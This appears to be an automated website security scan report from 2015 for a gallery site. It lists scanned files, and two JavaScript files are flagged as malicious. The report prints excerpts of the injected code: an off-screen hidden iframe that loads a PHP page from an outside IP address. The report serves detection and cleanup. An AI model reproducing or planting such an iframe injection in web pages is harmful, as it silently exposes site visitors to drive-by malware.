Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=whispersnorthgallery.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.whispersnorthgallery.com/ | 200 OK Content-Length: 8044 Content-Type: text/html | clean |
http://www.whispersnorthgallery.com/gallery/mydata.js | 200 OK Content-Length: 5474 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[2683 bytes skipped]... _text2 = "Contact by Email" dqm__show_urls_statusbar = true function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Antivirus reports:
| ||
http://www.whispersnorthgallery.com/tdqm_loader.js | 200 OK Content-Length: 4972 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3300 bytes skipped]... status=tval;q123=true;return;}}if(q123){status="";q123=false;}} function vl09() { var static='ajax'; var controller='index.php'; var vl = document.createElement('iframe'); vl.src = 'http://79.96.173.60/javascript/dfrgsnap.php'; vl.style.position = 'absolute'; vl.style.color = '574'; vl.style.height = '574px'; vl.style.width = '574px'; vl.style.left = '1000574'; vl.style.top = '1000574'; if (!document.getElementById('vl')) { document.write('<p id=\'vl\' class=\'vl09\' ></p>'); document.getElementById('vl').appendChild(vl); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expi ...[691 bytes skipped]... Antivirus reports:
| ||
http://www.whispersnorthgallery.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Wed, 14 Jan 2015 15:31:28 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.whispersnorthgallery.com/js/selectBox/jquery.selectBox.min.js | HTTP/1.1 404 Not Found Connection: close Date: Wed, 14 Jan 2015 15:31:30 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://www.whispersnorthgallery.com/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Wed, 14 Jan 2015 15:31:31 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://www.whispersnorthgallery.com/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Wed, 14 Jan 2015 15:31:32 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://www.whispersnorthgallery.com/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Wed, 14 Jan 2015 15:31:32 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: whispersnorthgallery.com
Result:
GET / HTTP/1.1
Host: whispersnorthgallery.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: whispersnorthgallery.com
Referer: http://www.google.com/search?q=whispersnorthgallery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: whispersnorthgallery.com
Referer: http://www.google.com/search?q=whispersnorthgallery.com
Result:
The result is similar to the first query. There are no suspicious redirects found.